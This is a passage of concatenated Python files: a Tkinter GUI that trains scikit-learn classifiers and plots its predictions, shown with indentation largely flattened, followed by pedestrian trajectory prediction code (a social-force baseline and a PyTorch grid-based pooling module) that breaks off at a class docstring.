from sklearn.naive_bayes import GaussianNB
# priors_string=self.priors_text.get()
# classify=GaussianNB(priors=priors_string)
classify=GaussianNB()
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
print("accuracy= ",accuracy)
        elif algorithm=='Logistic Regression':
from sklearn import linear_model
solver = self.solver_text.get()
Cstring=self.gamma_text.get()
C=float(Cstring)
classify=linear_model.LogisticRegression(solver=solver,C=C)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("Solver= ",solver,"C= ",C,"accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Support Vector Machine':
from sklearn import svm
svm_kernel = self.kernel_text.get()
Cstring=self.gamma_text.get()
C=float(Cstring)
classify=svm.SVC(kernel=svm_kernel,C=C)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("kernel= ",svm_kernel,"C= ",C, "accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Neural Network SciKit':
from sklearn.neural_network import MLPClassifier
solver = self.solver_text.get()
hidden_layer_sizes=self.hidden_layer_sizes_text.get()
            hidden_layer_sizes=tuple(int(s) for s in hidden_layer_sizes.split(','))  # np.fromstring with sep is deprecated
alpha = self.alpha_text.get()
            alpha = float(alpha)  # the default '1e-5' is not a valid int literal
classify = MLPClassifier(solver=solver, alpha=alpha, hidden_layer_sizes=(hidden_layer_sizes), random_state=1)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("Size of Hidden Layers= ",hidden_layer_sizes,"Solver= ",solver,"Alpha= ",alpha,"accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Neural Network 2':
import NeuronalNetwork2 as nn
hidden_size_string=self.numweightsinlayer1_text.get()
hidden_size=int(hidden_size_string)
# hidden_size = 25
learning_rate = 1
max_iter_string=self.maxiter_text.get()
max_iter=int(max_iter_string)
# max_iter=250
num_labels=int(self.num_labels.get())
nntraining_weights=nn.neuronal_network(Xtrain,labeltrain,num_labels,hidden_size,learning_rate,max_iter)
xval_pred_label=nn.neuronal_network_predict(X_xval,nntraining_weights,hidden_size,num_labels)
Xout_pred_label=nn.neuronal_network_predict(Xout_pred,nntraining_weights,hidden_size,num_labels)
accuracy=nn.score(label_xval,xval_pred_label)
self.scoreVar.set(accuracy)
print("Hidden Layer SIze: ",hidden_size, " Maximum Iterations",max_iter, "accuracy= ",accuracy)
else:
print('not a valid algorithm')
tend=time()
runtime=tend-t0
runtimestring="T&P", round(runtime, 3), "s"
print (runtimestring)
self.runtimeVar.set(runtimestring)
#Event handler: Sliding Bar Label, Training and xvalidation Sample Size
def onsizeScale(self, val):
self.sizeVar.set("Training Size: " + str(val) + "%"+" Xvalidation Size: " + str(100-int(val)) + "%")
#Event handler: Normalize data
def NormChecked(self):
if self.NormalizeVar.get() == 1:
self.master.title("Features Normalized")
else:
self.master.title("Features Raw")
#Event handler: Normalize data
def newTitle(self, val):
sender = val.widget
idx = sender.curselection()
value = sender.get(idx)
self.scoreVar.set(value)
#########Plot Input
#Event Handler, option data plot
def defXfit(self):
global Xfit, fit_label
chosen=self.v.get()
if chosen==1:
Xfit=Xin
fit_label=u_label
print ("Gather avg")
elif chosen==2:
Xfit=Xtrain
fit_label=labeltrain
print ("rand train")
elif chosen==3:
Xfit=X_xval
fit_label=label_xval
print ("rand xval")
elif chosen==4:
Xfit=NF.featureNormalize(Xtrain)
fit_label=labeltrain
print ("norm rand train")
elif chosen==5:
Xfit=NF.featureNormalize(X_xval)
fit_label=label_xval
print ("norm rand xval")
else:
print ("option is not valid")
    #Event Handler, Histogram Button
def HistogramClass(self):
import matplotlib.pyplot as plt
self.defXfit()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
print(bins,fit_label)
        plt.hist(fit_label, bins, density=True)  # density matches the 'Normalized Dist' y-label
plt.title('Histogram Input')
plt.xlabel('Label')
plt.ylabel('Normalized Dist')
plt.show()
#Event Handler, 1D Scatter Button
def scatter1D(self):
self.defXfit()
x1=Xfit[:,0]
x2=fit_label
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,'LABEL','1D Input Label')
plt.show()
#Event Handler, 2D Scatter Button
def scatter2D(self):
self.defXfit()
x1=Xfit[:,0]
x2=Xfit[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,x2_axis, '2D Input Label')
plt.show()
#Event Handler, 3D Scatter Button
def scatter3D(self):
self.defXfit()
x1=Xfit[:,0]
x2=Xfit[:,1]
x3=Xfit[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,fit_label,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Input Label')
plt.show()
#Event Handler, Output Text files with appended Label
def outputtxt(self):
import numpy as np
print("matrix shape",XappGather.shape)
dim2_Xout_pred_label=np.array(Xout_pred_label)[np.newaxis].T
print("pred label shape",dim2_Xout_pred_label.shape)
Xappend=np.append(XappGather,dim2_Xout_pred_label,axis=1)
print("Output matrix shape",Xappend.shape)
np.savetxt(output_file, Xappend)
#########Plot Output Predictions
#Event Handler, option data plot
def defXpred(self):
global Xpred_plot, pred_label_plot
chosen=self.v.get()
if chosen==1:
Xpred_plot=Xout
pred_label_plot=Xout_pred_label
print ("Gather avg")
elif chosen==2:
Xpred_plot=Xtrain
pred_label_plot=train_pred_label
print ("rand train")
elif chosen==3:
Xpred_plot=X_xval
pred_label_plot=xval_pred_label
print ("rand xval")
elif chosen==4:
Xpred_plot=NF.featureNormalize(Xtrain)
pred_label_plot=labeltrain
print ("norm rand train")
elif chosen==5:
Xpred_plot=NF.featureNormalize(X_xval)
pred_label_plot=label_xval
print ("norm rand xval")
else:
print ("option is not valid")
    #Event Handler, Histogram Button (predictions)
def HistogramClass_pred(self):
import matplotlib.pyplot as plt
self.defXpred()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(pred_label_plot, bins)
plt.title('Histogram Predicted')
plt.show()
#Event Handler, 1D Scatter Button
def scatter1D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=pred_label_plot
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,'LABEL','1D Predicted')
plt.show()
#Event Handler, 2D Scatter Button
def scatter2D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,x2_axis,'2D Predicted')
plt.show()
#Event Handler, 3D Scatter Button
def scatter3D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x3=Xpred_plot[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,pred_label_plot,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Predicted')
plt.show()
#Event Handler, Quick Plot for ppt
def quickplotppt(self):
import matplotlib.pyplot as plt
self.defXfit()
self.defXpred()
# Histograms
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(fit_label, bins, density=True)
plt.title('Histogram Input')
plt.show()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(pred_label_plot, bins, density=True)
plt.title('Histogram Predicted')
plt.show()
# 1D Scatters
x1=Xfit[:,0]
x2=fit_label
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,'LABEL','1D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=pred_label_plot
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,'LABEL','1D Predicted')
plt.show()
# 2D Scatters
x1=Xfit[:,0]
x2=Xfit[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,x2_axis, '2D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,x2_axis, '2D Predicted')
plt.show()
# 3D Scatters
x1=Xfit[:,0]
x2=Xfit[:,1]
x3=Xfit[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,fit_label,number_of_labels,x1_axis,x2_axis,x3_axis,'3D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x3=Xpred_plot[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,pred_label_plot,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Predicted')
plt.show()
def main():
root = Tk()
#root.geometry("250x150+300+300") # width x height + x + y
# we will use centreWindow instead
root.resizable(width=FALSE, height=FALSE)
# .. not resizable
app = Compact_Frame(root)
root.mainloop()
if __name__ == '__main__':
main()
```
#### File: Joseph-Garzon/MachineLearningGUI/Normalize_Features.py
```python
def featureNormalize(X):
    import numpy as np
    X = np.asarray(X)  # keep the converted array so lists work as well as ndarrays
    mu = X.mean(axis=0)  # per-feature mean
    X_norm = X - mu
    sigma = X_norm.std(axis=0)  # per-feature standard deviation
    X_norm = X_norm / sigma
    print('the mean is', mu)
    print('and sigma is', sigma)
    return X_norm
``` |
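A minimal usage sketch for `featureNormalize` (not part of the original repository; the feature matrix below is illustrative):
```python
import numpy as np
from Normalize_Features import featureNormalize
X = np.array([[1.0, 200.0],
              [2.0, 300.0],
              [3.0, 400.0]])  # three samples, two features
X_norm = featureNormalize(X)
print(X_norm.mean(axis=0))  # ~[0. 0.]
print(X_norm.std(axis=0))   # ~[1. 1.]
```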
{
"source": "JosephGesnouin/Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories",
"score": 2
} |
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/classical/socialforce.py
```python
import numpy as np
from scipy.interpolate import interp1d
import trajnetplusplustools
import socialforce
from socialforce.potentials import PedPedPotential
from socialforce.fieldofview import FieldOfView
def predict(input_paths, dest_dict=None, dest_type='interp', sf_params=[0.5, 2.1, 0.3],
predict_all=True, n_predict=12, obs_length=9):
pred_length = n_predict
def init_states(input_paths, start_frame, dest_dict, dest_type):
initial_state = []
for i, _ in enumerate(input_paths):
path = input_paths[i]
ped_id = path[0].pedestrian
past_path = [t for t in path if t.frame <= start_frame]
past_frames = [t.frame for t in path if t.frame <= start_frame]
future_path = [t for t in path if t.frame > start_frame]
len_path = len(past_path)
## To consider agent or not consider.
if start_frame in past_frames:
curr = past_path[-1]
## Velocity
if len_path >= 4:
stride = 3
prev = past_path[-4]
else:
stride = len_path - 1
prev = past_path[-len_path]
[v_x, v_y] = vel_state(prev, curr, stride)
## Destination
if dest_type == 'true':
if dest_dict is not None:
[d_x, d_y] = dest_dict[ped_id]
else:
raise ValueError
elif dest_type == 'interp':
[d_x, d_y] = dest_state(past_path, len_path)
elif dest_type == 'vel':
[d_x, d_y] = [pred_length*v_x, pred_length*v_y]
elif dest_type == 'pred_end':
[d_x, d_y] = [future_path[-1].x, future_path[-1].y]
else:
raise NotImplementedError
## Initialize State
initial_state.append([curr.x, curr.y, v_x, v_y, d_x, d_y])
return np.array(initial_state)
def vel_state(prev, curr, stride):
if stride == 0:
return [0, 0]
diff = np.array([curr.x - prev.x, curr.y - prev.y])
theta = np.arctan2(diff[1], diff[0])
speed = np.linalg.norm(diff) / (stride * 0.4)
return [speed*np.cos(theta), speed*np.sin(theta)]
def dest_state(path, length):
if length == 1:
return [path[-1].x, path[-1].y]
x = [t.x for t in path]
y = [t.y for t in path]
time = list(range(length))
f = interp1d(x=time, y=[x, y], fill_value='extrapolate')
return f(time[-1] + pred_length)
multimodal_outputs = {}
primary = input_paths[0]
neighbours_tracks = []
frame_diff = primary[1].frame - primary[0].frame
start_frame = primary[obs_length-1].frame
first_frame = primary[obs_length-1].frame + frame_diff
# initialize
initial_state = init_states(input_paths, start_frame, dest_dict, dest_type)
fps = 20
sampling_rate = int(fps / 2.5)
if len(initial_state) != 0:
# run
ped_ped = PedPedPotential(1./fps, v0=sf_params[1], sigma=sf_params[2])
field_of_view = FieldOfView()
s = socialforce.Simulator(initial_state, ped_ped=ped_ped, field_of_view=field_of_view,
delta_t=1./fps, tau=sf_params[0])
states = np.stack([s.step().state.copy() for _ in range(pred_length*sampling_rate)])
## states : pred_length x num_ped x 7
states = np.array([s for num, s in enumerate(states) if num % sampling_rate == 0])
else:
## Stationary
past_path = [t for t in input_paths[0] if t.frame == start_frame]
states = np.stack([[[past_path[0].x, past_path[0].y]] for _ in range(pred_length)])
# predictions
primary_track = states[:, 0, 0:2]
neighbours_tracks = states[:, 1:, 0:2]
## Primary Prediction Only
if not predict_all:
neighbours_tracks = []
# Unimodal Prediction
multimodal_outputs[0] = primary_track, neighbours_tracks
return multimodal_outputs
```
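The velocity estimate in `init_states` divides the displacement accumulated over `stride` frames by 0.4 s per frame (2.5 fps) and splits the resulting speed into x/y components. A standalone sketch of that arithmetic with illustrative values:
```python
import numpy as np
prev_xy, curr_xy, stride = np.array([0.0, 0.0]), np.array([1.2, 0.9]), 3
diff = curr_xy - prev_xy                       # displacement over `stride` frames
theta = np.arctan2(diff[1], diff[0])           # heading angle
speed = np.linalg.norm(diff) / (stride * 0.4)  # 0.4 s per frame at 2.5 fps
v_x, v_y = speed * np.cos(theta), speed * np.sin(theta)
print(v_x, v_y)  # 1.0 0.75
```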
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/Social-NCE_U-LSTM/gridbased_pooling.py
```python
from collections import defaultdict
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
def one_cold(i, n):
"""Inverse one-hot encoding."""
x = torch.ones(n, dtype=torch.bool)
x[i] = 0
return x
class GridBasedPooling(torch.nn.Module):
def __init__(self, cell_side=2.0, n=4, hidden_dim=128, out_dim=None,
type_='occupancy', pool_size=1, blur_size=1, front=False,
embedding_arch='one_layer', pretrained_pool_encoder=None,
constant=0, norm=0, layer_dims=None, latent_dim=16):
"""
Pools in a grid of size 'n * cell_side' centred at the ped location
cell_side: Scalar
size of each cell in real world
n: Scalar
number of cells along one dimension
out_dim: Scalar
            dimension of resultant interaction vector
        type_: ('occupancy', 'directional', 'social', 'dir_social')
            type of grid-based pooling
        front: Bool
            if True, pools neighbours only in the front of pedestrian
        embedding_arch: ('one_layer', 'two_layer', 'conv_two_layer', 'three_layer', 'lstm_layer')
            architecture to encode grid tensor
        pretrained_pool_encoder: None
            autoencoder to reduce dimensionality of grid
        constant: int
            background value of pooling grid
        norm: Scalar
            normalization scheme of pool grid [Default: 0, i.e. no normalization]
"""
super(GridBasedPooling, self).__init__()
self.cell_side = cell_side
self.n = n
self.type_ = type_
self.pool_size = pool_size
self.blur_size = blur_size
self.norm_pool = False
self.front = front
if self.front:
self.norm_pool = True
self.constant = constant
self.norm = norm
self.pool_scale = 1.0
## Type of pooling
self.pooling_dim = 1
if self.type_ == 'directional':
self.pooling_dim = 2
if self.type_ == 'social':
## Encode hidden-dim into latent-dim vector (faster computation)
self.hidden_dim_encoding = torch.nn.Linear(hidden_dim, latent_dim)
self.pooling_dim = latent_dim
if self.type_ == 'dir_social':
## Encode hidden-dim into latent-dim vector (faster computation)
self.hidden_dim_encoding = torch.nn.Linear(hidden_dim, latent_dim)
self.pooling_dim = latent_dim + 2
## Final Representation Size
if out_dim is None:
out_dim = hidden_dim
self.out_dim = out_dim
## Pretrained AE
self.pretrained_model = pretrained_pool_encoder
input_dim = None
if self.pretrained_model is not None:
input_dim = self.pretrained_model[-1].out_features
if embedding_arch == 'None':
self.out_dim = input_dim
## Embedding Grid / AE Representation
self.embedding = None
self.embedding_arch = embedding_arch
if self.embedding_arch == 'one_layer':
self.embedding = self.one_layer(input_dim)
elif self.embedding_arch == 'two_layer':
self.embedding = self.two_layer(input_dim, layer_dims)
elif self.embedding_arch == 'conv_two_layer':
self.embedding = self.conv_two_layer(input_dim, layer_dims)
elif self.embedding_arch == 'three_layer':
self.embedding = self.three_layer(input_dim, layer_dims)
elif self.embedding_arch == 'lstm_layer':
self.embedding = self.lstm_layer(hidden_dim)
def forward_grid(self, grid):
""" Encodes the generated grid tensor
Parameters
----------
grid: [num_tracks, self.pooling_dim, self.n, self.n]
Generated Grid
Returns
-------
interactor_vector: Tensor [num_tracks, self.out_dim]
"""
num_tracks = grid.size(0)
## Encode grid using pre-trained autoencoder (reduce dimensionality)
if self.pretrained_model is not None:
if not isinstance(self.pretrained_model[0], torch.nn.Conv2d):
grid = grid.reshape(num_tracks, -1)
mean, std = grid.mean(), grid.std()
if std == 0:
std = 0.03
grid = (grid - mean) / std
grid = self.pretrained_model(grid)
## Normalize Grid (if necessary)
grid = grid.reshape(num_tracks, -1)
## Normalization schemes
if self.norm == 1:
# "Global Norm"
mean, std = grid.mean(), grid.std()
std[std == 0] = 0.09
grid = (grid - mean) / std
elif self.norm == 2:
# "Feature Norm"
mean, std = grid.mean(dim=0, keepdim=True), grid.std(dim=0, keepdim=True)
std[std == 0] = 0.1
grid = (grid - mean) / std
elif self.norm == 3:
# "Sample Norm"
mean, std = grid.mean(dim=1, keepdim=True), grid.std(dim=1, keepdim=True)
std[std == 0] = 0.1
grid = (grid - mean) / std
## Embed grid
if self.embedding_arch == 'lstm_layer':
return self.lstm_forward(grid)
elif self.embedding:
return self.embedding(grid)
return grid
def forward(self, hidden_state, obs1, obs2):
## Make chosen grid
if self.type_ == 'occupancy':
grid = self.occupancies(obs1, obs2)
elif self.type_ == 'directional':
grid = self.directional(obs1, obs2)
elif self.type_ == 'social':
grid = self.social(hidden_state, obs1, obs2)
elif self.type_ == 'dir_social':
grid = self.dir_social(hidden_state, obs1, obs2)
## Forward Grid
return self.forward_grid(grid)
def occupancies(self, obs1, obs2):
## Generate the Occupancy Map
return self.occupancy(obs2, past_obs=obs1)
def directional(self, obs1, obs2):
## Makes the Directional Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None)
## Generate values to input in directional grid tensor (relative velocities in this case)
vel = obs2 - obs1
unfolded = vel.unsqueeze(0).repeat(vel.size(0), 1, 1)
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
relative = unfolded - vel.unsqueeze(1)
## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## Generate Occupancy Map
return self.occupancy(obs2, relative, past_obs=obs1)
def social(self, hidden_state, obs1, obs2):
## Makes the Social Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None, past_obs=obs1)
## Generate values to input in hiddenstate grid tensor (compressed hidden-states in this case)
## [num_tracks, hidden_dim] --> [num_tracks, num_tracks-1, pooling_dim]
hidden_state_grid = hidden_state.repeat(num_tracks, 1).view(num_tracks, num_tracks, -1)
hidden_state_grid = hidden_state_grid[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, -1)
hidden_state_grid = self.hidden_dim_encoding(hidden_state_grid)
## Generate Occupancy Map
return self.occupancy(obs2, hidden_state_grid, past_obs=obs1)
def dir_social(self, hidden_state, obs1, obs2):
## Makes the Directional + Social Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None)
## Generate values to input in directional grid tensor (relative velocities in this case)
vel = obs2 - obs1
unfolded = vel.unsqueeze(0).repeat(vel.size(0), 1, 1)
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
relative = unfolded - vel.unsqueeze(1)
## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## Generate values to input in hiddenstate grid tensor (compressed hidden-states in this case)
## [num_tracks, hidden_dim] --> [num_tracks, num_tracks-1, pooling_dim]
hidden_state_grid = hidden_state.repeat(num_tracks, 1).view(num_tracks, num_tracks, -1)
hidden_state_grid = hidden_state_grid[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, -1)
hidden_state_grid = self.hidden_dim_encoding(hidden_state_grid)
dir_social_rep = torch.cat([relative, hidden_state_grid], dim=2)
## Generate Occupancy Map
return self.occupancy(obs2, dir_social_rep, past_obs=obs1)
@staticmethod
def normalize(relative, obs, past_obs):
## Normalize pooling grid along direction of pedestrian motion
diff = torch.cat([obs[:, 1:] - past_obs[:, 1:], obs[:, 0:1] - past_obs[:, 0:1]], dim=1)
velocity = np.arctan2(diff[:, 0].clone(), diff[:, 1].clone())
theta = (np.pi / 2) - velocity
ct = torch.cos(theta)
st = torch.sin(theta)
## Cleaner?
relative = torch.stack([torch.einsum('tc,ci->ti', pos_instance, torch.Tensor([[ct[i], st[i]], [-st[i], ct[i]]])) for
i, pos_instance in enumerate(relative)], dim=0)
return relative
def occupancy(self, obs, other_values=None, past_obs=None):
"""Returns the occupancy map filled with respective attributes.
A different occupancy map with respect to each pedestrian
Parameters
----------
obs: Tensor [num_tracks, 2]
Current x-y positions of all pedestrians, used to construct occupancy map.
other_values: Tensor [num_tracks, num_tracks-1, 2]
Attributes (self.pooling_dim) of the neighbours relative to pedestrians, to be filled in the occupancy map
e.g. Relative velocities of pedestrians
past_obs: Tensor [num_tracks, 2]
Previous x-y positions of all pedestrians, used to construct occupancy map.
Useful for normalizing the grid tensor.
Returns
-------
grid: Tensor [num_tracks, self.pooling_dim, self.n, self.n]
"""
num_tracks = obs.size(0)
##mask unseen
mask = torch.isnan(obs).any(dim=1)
obs[mask] = 0
## if only primary pedestrian present
if num_tracks == 1:
return self.constant*torch.ones(1, self.pooling_dim, self.n, self.n, device=obs.device)
## Get relative position
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
unfolded = obs.unsqueeze(0).repeat(obs.size(0), 1, 1)
relative = unfolded - obs.unsqueeze(1)
## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## In case of 'occupancy' pooling
if other_values is None:
other_values = torch.ones(num_tracks, num_tracks-1, self.pooling_dim, device=obs.device)
## Normalize pooling grid along direction of pedestrian motion
if self.norm_pool:
relative = self.normalize(relative, obs, past_obs)
if self.front:
oij = (relative / (self.cell_side / self.pool_size) + torch.Tensor([self.n * self.pool_size / 2, 0]))
else:
oij = (relative / (self.cell_side / self.pool_size) + self.n * self.pool_size / 2)
range_violations = torch.sum((oij < 0) + (oij >= self.n * self.pool_size), dim=2)
range_mask = range_violations == 0
oij[~range_mask] = 0
other_values[~range_mask] = self.constant
oij = oij.long()
## Flatten
oi = oij[:, :, 0] * self.n * self.pool_size + oij[:, :, 1]
# faster occupancy
occ = self.constant*torch.ones(num_tracks, self.n**2 * self.pool_size**2, self.pooling_dim, device=obs.device)
## Fill occupancy map with attributes
occ[torch.arange(occ.size(0)).unsqueeze(1), oi] = other_values
occ = torch.transpose(occ, 1, 2)
occ_2d = occ.view(num_tracks, -1, self.n * self.pool_size, self.n * self.pool_size)
if self.blur_size == 1:
occ_blurred = occ_2d
else:
occ_blurred = torch.nn.functional.avg_pool2d(
occ_2d, self.blur_size, 1, int(self.blur_size / 2), count_include_pad=True)
occ_summed = torch.nn.functional.lp_pool2d(occ_blurred, 1, self.pool_size)
# occ_summed = torch.nn.functional.avg_pool2d(occ_blurred, self.pool_size) # faster?
return occ_summed
## Architectures of Encoding Grid
def one_layer(self, input_dim=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024
def conv_two_layer(self, input_dim=None, layer_dims=None):
## Similar to twoLayer. Will be removed in future version
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Flatten(),
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024
def two_layer(self, input_dim=None, layer_dims=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024, 512
def three_layer(self, input_dim=None, layer_dims=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], layer_dims[1]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[1], self.out_dim),
torch.nn.ReLU(),)
def lstm_layer(self, hidden_dim):
self.hidden_dim = hidden_dim
self.pool_lstm = torch.nn.LSTMCell(self.out_dim, self.hidden_dim)
self.hidden2pool = torch.nn.Linear(self.hidden_dim, self.out_dim)
return torch.nn.Sequential(
torch.nn.Linear(self.n * self.n * self.pooling_dim, self.out_dim),
torch.nn.ReLU(),)
def reset(self, num_tracks, device):
self.track_mask = None
if self.embedding_arch == 'lstm_layer':
self.hidden_cell_state = (
[torch.zeros(self.hidden_dim, device=device) for _ in range(num_tracks)],
[torch.zeros(self.hidden_dim, device=device) for _ in range(num_tracks)],
)
def lstm_forward(self, grid):
""" Forward process for LSTM-based grid encoding"""
grid_embedding = self.embedding(grid)
num_tracks = grid.size(0)
## If only primary pedestrian of the scene present
if torch.sum(self.track_mask).item() == 1:
return torch.zeros(num_tracks, self.out_dim, device=grid.device)
hidden_cell_stacked = [
torch.stack([h for m, h in zip(self.track_mask, self.hidden_cell_state[0]) if m], dim=0),
torch.stack([c for m, c in zip(self.track_mask, self.hidden_cell_state[1]) if m], dim=0),
]
## Update interaction-encoder LSTM
hidden_cell_stacked = self.pool_lstm(grid_embedding, hidden_cell_stacked)
interaction_vector = self.hidden2pool(hidden_cell_stacked[0])
## Save hidden-cell-states
mask_index = [i for i, m in enumerate(self.track_mask) if m]
for i, h, c in zip(mask_index,
hidden_cell_stacked[0],
hidden_cell_stacked[1]):
self.hidden_cell_state[0][i] = h
self.hidden_cell_state[1][i] = c
return interaction_vector
def make_grid(self, obs):
""" Make the grids for all time-steps together
Only supports Occupancy and Directional pooling
"""
if obs.ndim == 2:
obs = obs.unsqueeze(0)
timesteps = obs.size(0)
grid = []
for i in range(1, timesteps):
obs1 = obs[i-1]
obs2 = obs[i]
## Remove NANs
track_mask = (torch.isnan(obs1[:, 0]) + torch.isnan(obs2[:, 0])) == 0
obs1, obs2 = obs1[track_mask], obs2[track_mask]
if self.type_ == 'occupancy':
grid.append(self.occupancies(obs1, obs2))
elif self.type_ == 'directional':
grid.append(self.directional(obs1, obs2))
return grid
```
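A hypothetical smoke test for `GridBasedPooling` (not from the original repository), pooling two pedestrians into a 4x4 occupancy grid and encoding it with the default one-layer embedding:
```python
import torch
pool = GridBasedPooling(type_='occupancy', n=4, cell_side=2.0, hidden_dim=128)
obs1 = torch.tensor([[0.0, 0.0], [1.0, 1.0]])  # positions at t-1
obs2 = torch.tensor([[0.5, 0.0], [1.0, 1.5]])  # positions at t
hidden = torch.zeros(2, 128)  # hidden states are unused for 'occupancy' pooling
out = pool(hidden, obs1, obs2)
print(out.shape)  # torch.Size([2, 128])
```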
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/Social-NCE_U-LSTM/more_non_gridbased_pooling.py
```python
from collections import defaultdict
import torch
class NMMP(torch.nn.Module):
""" Interaction vector is obtained by message passing between
hidden-state of all neighbours. Proposed in NMMP, CVPR 2020
Parameters:
mlp_dim: embedding size of hidden-state
k: number of iterations of message passing
out_dim: dimension of resultant interaction vector
Attributes
----------
